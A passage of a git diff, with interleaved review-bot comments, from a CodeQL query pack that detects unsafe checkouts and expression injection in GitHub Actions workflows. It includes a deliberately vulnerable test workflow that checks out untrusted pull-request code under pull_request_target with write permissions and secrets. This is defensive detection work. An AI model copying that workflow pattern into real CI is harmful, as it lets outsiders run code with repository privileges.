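Review bot: `Utils::normalizeExpr` is a new public, `bindingset`-annotated helper with no QLDoc, and its three chained replacements are not self-explanatory (a run of `.`, quotes or brackets becomes one `.`, a trailing `.` is dropped, and `.` followed by whitespace becomes a space). A QLDoc along the lines of `/** Normalizes bracket/quoted property access such as github['event']["x"] to the dotted form github.event.x, so context regexes match either spelling. */` would make the intent checkable against its callers, which are outside this hunk. Worth recording there too: the first replacement rewrites quotes inside string-literal arguments as well (e.g. `'a.b'` becomes `.a.b.`), so the result is only suitable for matching context paths, not for reconstructing the expression.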
@@ -45,6 +45,14 @@ private newtype TAstNode = ) ) ) + or + // if's conditions do not need to be delimted with ${{}} + exists(YamlMapping m | + m.maps(key, value) and + key.(YamlScalar).getValue() = ["if"] and + value.getValue() = raw and + exprOffset = 1 + ) } or TCompositeAction(YamlMapping n) { n instanceof YamlDocument and @@ -123,7 +131,7 @@ class ScalarValueImpl extends AstNodeImpl, TScalarValueNode { override Location getLocation() { result = value.getLocation() } - override YamlNode getNode() { result = value } + override YamlScalar getNode() { result = value } } class ExpressionImpl extends AstNodeImpl, TExpressionNode { @@ -135,15 +143,16 @@ class ExpressionImpl extends AstNodeImpl, TExpressionNode { ExpressionImpl() { this = TExpressionNode(key, value, rawExpression, exprOffset - 1) and - expression = - rawExpression.regexpCapture("\\$\\{\\{\\s*([A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+)\\s*\\}\\}", 1) + if rawExpression.trim().regexpMatch("\\$\\{\\{.*\\}\\}") + then expression = rawExpression.trim().regexpCapture("\\$\\{\\{\\s*(.*)\\s*\\}\\}", 1).trim() + else expression = rawExpression.trim() } override string toString() { result = expression } override AstNodeImpl getAChildNode() { none() } - override AstNodeImpl getParentNode() { result.getNode() = value } + override ScalarValueImpl getParentNode() { result.getNode() = value } override string getAPrimaryQlClass() { result = "ExpressionNode" } @@ -638,6 +647,9 @@ class IfImpl extends AstNodeImpl, TIfNode { /** Gets the condition that must be satisfied for this job to run. */ string getCondition() { result = n.(YamlScalar).getValue() } + + /** Gets the condition that must be satisfied for this job to run. */ + ExpressionImpl getConditionExpr() { result.getParentNode().getNode() = n } } class EnvImpl extends AstNodeImpl, TEnvNode { diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 0b3a2873d516..438e3dfe7fc2 100644 
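Review bot: The comment on the new `if` branch of `TExpressionNode` has a typo and the `exprOffset = 1` literal is left unexplained, which matters because the other branch of this newtype (outside the hunk) computes the offset from the `${{` delimiter position. I would write it as `// if's conditions do not need to be delimited with ${{ }}; the whole scalar is the expression, so the offset is the scalar start` and, if the value really is always the single `if` key, replace `key.(YamlScalar).getValue() = ["if"]` with the plain string `= "if"`.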
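Review bot: The delimiter test `rawExpression.trim().regexpMatch("\\$\\{\\{.*\\}\\}")` uses `.`, which in the Java-style regexes CodeQL evaluates does not cross line terminators, so a multi-line `${{ ... }}` value (a `|` or `>` block scalar) presumably falls through to the `else` branch and keeps its `${{`/`}}` delimiters as the expression text, where the old character-class capture would simply have produced no node. If that is acceptable a comment on the `if` saying `// single-line delimited expressions only; block scalars keep their delimiters` would make it explicit, otherwise prefixing both regexes with `(?s)` handles it. Note also that the greedy `.*` spans from the first `${{` to the last `}}`, so a raw value holding two delimited expressions would yield one merged expression; I assume rawExpression is already a single delimited span except for the new `if` case.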
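Review bot: The QLDoc added for `IfImpl.getConditionExpr()` is a verbatim copy of the one on `getCondition()` and says "for this job to run", although `If` nodes are also attached to steps (the checkout query in this series calls `checkout.getIf()` on a step) and the new predicate returns an `ExpressionImpl` rather than the raw string. Suggested text: `/** Gets the condition of this if, as an expression node, whether or not it was written with ${{ }} delimiters. */`. The public wrapper `If.getConditionExpr()` added in `Ast.qll` in the same commit has no doc comment at all and could take the same sentence.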
--- a/ql/src/Security/CWE-829/UntrustedCheckout.ql
+++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql
@@ -18,29 +18,32 @@ import actions /** An If node that contains an actor, user or label check */ class ControlCheck extends If { ControlCheck() { - this.getCondition().regexpMatch(".*github\\.(triggering_)?actor.*") or - this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.user\\.login.*") or - this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.labels.*") or - this.getCondition().regexpMatch(".*github\\.event\\.label\\.name.*") + Utils::normalizeExpr(this.getCondition()) + .regexpMatch([ + ".*github\\.actor.*", ".*github\\.triggering_actor.*", + ".*github\\.event\\.pull_request\\.user\\.login.*", + ".*github\\.event\\.pull_request\\.labels.*", ".*github\\.event\\.label\\.name.*" + ]) } } bindingset[s] predicate containsHeadRef(string s) { - s.matches("%" + - [ - "github.event.number", // The pull request number. - "github.event.pull_request.head.ref", // The ref name of head. - "github.event.pull_request.head.sha", // The commit SHA of head. - "github.event.pull_request.id", // The pull request ID. - "github.event.pull_request.number", // The pull request number. - "github.event.pull_request.merge_commit_sha", // The SHA of the merge commit. - "github.head_ref", // The head_ref or source branch of the pull request in a workflow run. - "github.event.workflow_run.head_branch", // The branch of the head commit. - "github.event.workflow_run.head_commit.id", // The SHA of the head commit. - "github.event.workflow_run.head_sha", // The SHA of the head commit. - "env.GITHUB_HEAD_REF", - ] + "%") + Utils::normalizeExpr(s) + .matches("%" + + [ + "github.event.number", // The pull request number. + "github.event.pull_request.head.ref", // The ref name of head. + "github.event.pull_request.head.sha", // The commit SHA of head. + "github.event.pull_request.id", // The pull request ID. + "github.event.pull_request.number", // The pull request number. + "github.event.pull_request.merge_commit_sha", // The SHA of the merge commit. 
+ "github.head_ref", // The head_ref or source branch of the pull request in a workflow run. + "github.event.workflow_run.head_branch", // The branch of the head commit. + "github.event.workflow_run.head_commit.id", // The SHA of the head commit. + "github.event.workflow_run.head_sha", // The SHA of the head commit. + "env.GITHUB_HEAD_REF", + ] + "%") } /** Checkout of a Pull Request HEAD ref */ diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 4ef2a2e58755..df8c6ddf9cda 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -190,7 +190,7 @@ parentNodes | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | | .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:11:34:25 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | | .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | 
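Review bot: `ControlCheck` treats any `if` whose normalized condition merely mentions one of the listed contexts as a trust gate, so a condition like `github.actor != 'dependabot[bot]'` or one that only compares a label for a different purpose suppresses the untrusted-checkout alert, and `.*github\\.actor.*` also matches `github.actor_id`. The commit widens the list without changing that heuristic, so I would record the limitation on the class doc: `/** An If node whose condition mentions an actor, user or label context. No attempt is made to verify that the comparison actually restricts who can trigger the checkout. */`. Anchoring the actor patterns as `.*\\bgithub\\.actor\\b.*` would at least remove the `actor_id` overlap. `containsHeadRef` in the same hunk has the same mention-only semantics via `matches("%...%")`, which is fine for a source predicate but worth stating in its own comment.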
@@ -415,3 +415,8 @@ calls | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | needs | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +testNormalizeExpr +| foo['bar'] == baz | foo.bar == baz | +| github.event.pull_request.user["login"] | github.event.pull_request.user.login | +| github.event.pull_request.user['login'] | github.event.pull_request.user.login | +| github.event.pull_request['user']['login'] | github.event.pull_request.user.login | diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 8cf97d58ab03..268396a711e3 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -1,4 +1,5 @@ import codeql.actions.Ast +import codeql.actions.Ast::Utils as Utils import codeql.actions.Cfg as Cfg import codeql.actions.DataFlow import codeql.Locations @@ -59,3 +60,12 @@ query predicate summaries(string action, string version, string input, string ou query predicate calls(DataFlow::CallNode call, string callee) { callee = call.getCallee() } query predicate needs(DataFlow::Node e) { e.asExpr() instanceof NeedsExpression } + +query string testNormalizeExpr(string s) { + s = + [ + "github.event.pull_request.user['login']", "github.event.pull_request.user[\"login\"]", + "github.event.pull_request['user']['login']", "foo['bar'] == baz" + ] and + result = Utils::normalizeExpr(s) +} diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected index c9ac215666f7..38884b3eaef4 100644 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected 
@@ -3,6 +3,7 @@ edges | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | 
@@ -58,6 +59,8 @@ nodes | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | 
@@ -187,6 +190,7 @@ nodes subpaths #select | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | steps.remove_quotations.outputs.replaced | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | github.event.issue.body | diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected index cb924c97ea12..21a9978c54f8 100644 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected 
@@ -3,6 +3,7 @@ edges | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | 
@@ -58,6 +59,8 @@ nodes | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | 
@@ -188,6 +191,7 @@ subpaths #select | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | ${{ steps.changed-files.outputs.all_changed_files }} | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml new file mode 100644 index 000000000000..cb20cfe629bf --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml 
@@ -0,0 +1,135 @@ +name: Python CI + +on: + push: + branches: [ master ] + pull_request_target: + branches: [ master, stable ] + +concurrency: + group: ${{ format('ci-{0}', github.head_ref && format('pr-{0}', github.event.pull_request.number) || github.sha) }} + cancel-in-progress: ${{ github.event_name == 'pull_request_target' }} + +jobs: + lint: + runs-on: ubuntu-latest + env: + min-python-version: "3.10" + + steps: + - name: Checkout repository + uses: actions/checkout@v3 + with: + fetch-depth: 0 + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + + - name: Set up Python ${{ env.min-python-version }} + uses: actions/setup-python@v2 + with: + python-version: ${{ env.min-python-version }} + + - name: Install dependencies + run: | + python -m pip install --upgrade pip + pip install -r requirements.txt + + - name: Lint with flake8 + run: flake8 + + - name: Check black formatting + run: black . --check + if: success() || failure() + + - name: Check isort formatting + run: isort . --check + if: success() || failure() + + - name: Check mypy formatting + run: mypy + if: success() || failure() + + test: + permissions: + # Gives the action the necessary permissions for publishing new + # comments in pull requests. 
+ pull-requests: write + # Gives the action the necessary permissions for pushing data to the + # python-coverage-comment-action branch, and for editing existing + # comments (to avoid publishing multiple comments in the same PR) + contents: write + runs-on: ubuntu-latest + strategy: + matrix: + python-version: ["3.10"] + + steps: + - name: Check out repository + uses: actions/checkout@v3 + with: + fetch-depth: 0 + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + + - name: Set up Python ${{ matrix.python-version }} + uses: actions/setup-python@v2 + with: + python-version: ${{ matrix.python-version }} + + - name: Install dependencies + run: | + python -m pip install --upgrade pip + pip install -r requirements.txt + + - name: Run unittest tests with coverage + run: | + pytest -n auto --cov=autogpt --cov-report term-missing --cov-branch --cov-report xml --cov-report term + env: + CI: true + PROXY: ${{ secrets.PROXY }} + AGENT_MODE: ${{ vars.AGENT_MODE }} + AGENT_TYPE: ${{ vars.AGENT_TYPE }} + + - name: Upload coverage reports to Codecov + uses: codecov/codecov-action@v3 + + - name: Stage new files and commit + id: stage_files + run: | + git add tests + git diff --cached --quiet && echo "No changes to commit" && exit 0 + git config user.email "github-actions@github.com" + git config user.name "GitHub Actions" + git commit -m "Add new cassettes" + TIMESTAMP_COMMIT=$(date +%Y%m%d%H%M%S) # generate a timestamp + echo "TIMESTAMP_COMMIT=TIMESTAMP_COMMIT" >> $GITHUB_ENV + + + - name: Create PR + id: create_pr + if: ${{ env.TIMESTAMP_COMMIT != null }} + uses: peter-evans/create-pull-request@v5 + with: + commit-message: Update cassettes + branch: cassette-diff-PR-${{ github.event.pull_request.number }}-${{ env.TIMESTAMP_COMMIT }} + title: "Update cassette-diff-PR${{ github.event.pull_request.number }}-${{ env.TIMESTAMP_COMMIT }}" + body: "This PR updates the cassettes. Please merge it." 
+ + + - name: Check PR + if: ${{ env.TIMESTAMP_COMMIT != null }} + run: | + echo "Pull Request Number - ${{ steps.create_pr.outputs.pull-request-number }}" + echo "Pull Request URL - ${{ steps.create_pr.outputs.pull-request-url }}" + + - name: Comment PR URL in the current PR + if: ${{ env.TIMESTAMP_COMMIT != null }} + uses: thollander/actions-comment-pull-request@v2 + with: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + message: | + Please click [HERE](${{ steps.create_pr.outputs.pull-request-url }}) and merge this PR to update the cassettes. + + - name: Fail if new PR created + if: ${{ env.TIMESTAMP_COMMIT != null }} + run: exit 1 diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 6620d2ac3852..67fcc5555d16 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -1,5 +1,8 @@ | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | | 
.github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected index 7527a1e15f2c..be1c7cbfebdb 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected @@ -1 +1,4 @@ -| .github/workflows/untrusted_checkout.yml:9:7:13:4 | Uses Step | Potential unsafe checkout of untrusted pull request on 'pull_request_target'. | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/untrusted_checkout.yml:9:7:13:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 87b284e5e6b49b431aef3c23099ac80b0fe8753e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 13 Mar 2024 19:14:57 +0100 Subject: [PATCH 093/707] update --- ql/lib/codeql/actions/Ast.qll | 8 +- .../codeql/actions/dataflow/FlowSources.qll | 89 +++++++++++-------- 2 files changed, 55 insertions(+), 42 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 271182a05dd2..3d675bebce02 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -5,9 +5,11 @@ module Utils { bindingset[expr] string normalizeExpr(string expr) { result = - expr.regexpReplaceAll("[\\.\\'\\[\\]\"]+", ".") - .regexpReplaceAll("\\.$", "") - .regexpReplaceAll("\\.\\s", " ") + expr.replaceAll("['", ".") + .replaceAll("']", "") + .replaceAll("[\"", ".") + .replaceAll("\"]", "") + .regexpReplaceAll("\\s*\\.\\s*", ".") } } diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 23ae225e07ed..d3a96e1a2c7a 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -1,6 +1,7 @@ import actions import codeql.actions.DataFlow import codeql.actions.dataflow.ExternalFlow +import codeql.actions.Ast::Utils as Utils /** * A data flow source. @@ -24,8 +25,11 @@ abstract class RemoteFlowSource extends SourceNode { bindingset[context] private predicate isExternalUserControlledIssue(string context) { - context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*issue\\s*\\.\\s*title\\b") or - context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*issue\\s*\\.\\s*body\\b") + exists(string reg | + reg = ["\\bgithub\\.event\\.issue\\.title\\b", "\\bgithub\\.event\\.issue\\.body\\b"] + | + Utils::normalizeExpr(context).regexpMatch(reg) + ) } bindingset[context] 
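Review bot: `normalizeExpr` still has no QLDoc, and its rewrite is narrower than the name suggests: only the exact spellings `['x']` and `["x"]` are folded into dot form, so `[ 'x' ]` with inner whitespace and numeric indexes such as `[0]` are left untouched, while the trailing `\\s*\\.\\s*` collapse also rewrites dots inside string literals. Callers whose patterns still expect `\\[[0-9]+\\]` (the pages and commits regexes in the next file) therefore remain correct, but that contract should be pinned in a doc comment such as `/** Rewrites ['x'] and ["x"] property access to .x and strips whitespace around dots so callers can match one canonical spelling; numeric indexes like [0] and the contents of string literals are not normalized. */`.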
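Review bot: `Utils::normalizeExpr(context).regexpMatch(reg)` in `isExternalUserControlledIssue` is a whole-string match if CodeQL's `regexpMatch` keeps its documented semantics, so the `\\b` anchors are redundant and a context that wraps the source in a call, e.g. `toJSON(github.event.issue.title)` or `format('{0}', github.event.issue.body)`, is not recognised as a source at all. That behaviour predates this commit, but the switch to normalized matching is a good moment to either state it, `// Only a bare context reference is treated as a source; references embedded in calls or concatenations are not matched`, or move to `regexpFind` / `.*` wrappers if embedded references are meant to count. The same applies to the pull request, review, comment, pages, commit, discussion and workflow_run predicates in the following hunks of this file.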
@@ -33,35 +37,39 @@ private predicate isExternalUserControlledPullRequest(string context) { exists(string reg | reg = [ - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*title\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*body\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*label\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*repo\\s*\\.\\s*default_branch\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*repo\\s*\\.\\s*description\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*repo\\s*\\.\\s*homepage\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*ref\\b", - "\\bgithub\\s*\\.\\s*head_ref\\b" + "\\bgithub\\.event\\.pull_request\\.title\\b", "\\bgithub\\.event\\.pull_request\\.body\\b", + "\\bgithub\\.event\\.pull_request\\.head\\.label\\b", + "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.default_branch\\b", + "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.description\\b", + "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.homepage\\b", + "\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", "\\bgithub\\.head_ref\\b" ] | - context.regexpMatch(reg) + Utils::normalizeExpr(context).regexpMatch(reg) ) } bindingset[context] private predicate isExternalUserControlledReview(string context) { - 